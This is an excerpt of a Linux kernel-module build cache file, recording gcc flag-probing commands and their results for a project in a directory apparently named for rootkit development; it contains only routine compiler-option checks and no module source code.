__cached_/bin/bash_./scripts/gcc-goto.sh_gcc_-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context___-O2__--param_allow-store-data-races_0 := y 50 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wframe-larger-than_1024";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wframe-larger-than=1024 51 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wunused-but-set-variable_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-unused-but-set-variable";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-unused-but-set-variable 52 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wunused-const-variable_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-unused-const-variable";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-unused-const-variable 53 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls__-fno-var-tracking-assignments_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-fno-var-tracking-assignments";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-var-tracking-assignments 54 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments__-mfentry_-DCC_USING_FENTRY_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-mfentry_-DCC_USING_FENTRY";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mfentry -DCC_USING_FENTRY 55 | __cached_gcc_-print-file-name_include := /usr/lib/gcc/x86_64-linux-gnu/7/include 56 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wdeclaration-after-statement";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wdeclaration-after-statement 57 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wpointer-sign_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-pointer-sign";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-pointer-sign 58 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-Wstringop-truncation_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-stringop-truncation";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 59 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-strict-overflow";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-strict-overflow 60 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-merge-all-constants";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-merge-all-constants 61 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fmerge-constants";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fmerge-constants 62 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-stack-check";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-stack-check 63 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fconserve-stack";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fconserve-stack 64 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_implicit-int";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=implicit-int 65 | 
